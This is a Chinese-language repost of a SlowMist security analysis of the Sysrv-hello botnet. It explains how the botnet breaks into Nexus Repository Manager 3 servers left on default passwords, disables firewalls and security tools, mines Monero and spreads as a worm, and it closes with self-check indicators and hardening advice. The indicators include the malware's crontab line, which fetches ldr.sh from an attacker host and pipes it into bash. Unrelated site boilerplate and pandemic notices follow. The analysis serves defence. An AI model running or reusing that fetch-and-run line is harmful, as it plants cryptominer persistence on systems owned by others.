慢雾:技术拆解 Sysrv-hello 僵尸网络入侵原理_TAB:Tellor

攻击路径

Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击,Maven私服部署会用到NexusRepositoryManager3,由于Maven是个流行服务,所以也给了Sysrv-hello僵尸网络的大范围感染机会。

当NexusRepositoryManager3服务对外网开放且存在默认账号密码时,Sysrv-hello就可以直接扫描入侵,利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。

入侵到服务器后会自动下载执行ldr.sh文件,该文件主要功能:1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿,文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴

第二个木马sysrv的主要功能:1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播,随机扫描其他IP服务,同样进行NexusRepositoryManager3漏洞利用,同时也会尝试入侵MySQL、Tomcat、WebLogic等服务

自查方法

进程:network01sysrv

文件:/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口:52013

存在以上这些,停止备份样本后删除。

加固建议

删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问,严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后,重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力,存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。

本文来源于非小号媒体平台:

慢雾科技

现已在非小号资讯平台发布68篇作品,

非小号开放平台欢迎币圈作者入驻

入驻指南:

/apply_guide/

本文网址:

/news/9606255.html

免责声明:

1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险

2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场

上一篇:

深入解析MakeDao在新周期里的机遇和风险

郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。

金智博客

火必陇南核心要点_:

非必要不要前往有疫情风险的地区,如必须外出旅行,要认真做好自我和同行人员健康状况评估,及时了解旅途及目的地疫情防控政策.

BNB乌兰察布核心要点_:

1.建议广大居民合理安排出行,如非必要,近期不要前往国家动态调整的中高风险地区,如确需前往,要在返回时主动向居住地社区(嘎查村)、单位报告,配合落实相应防控措施.

[0:15ms0-3:707ms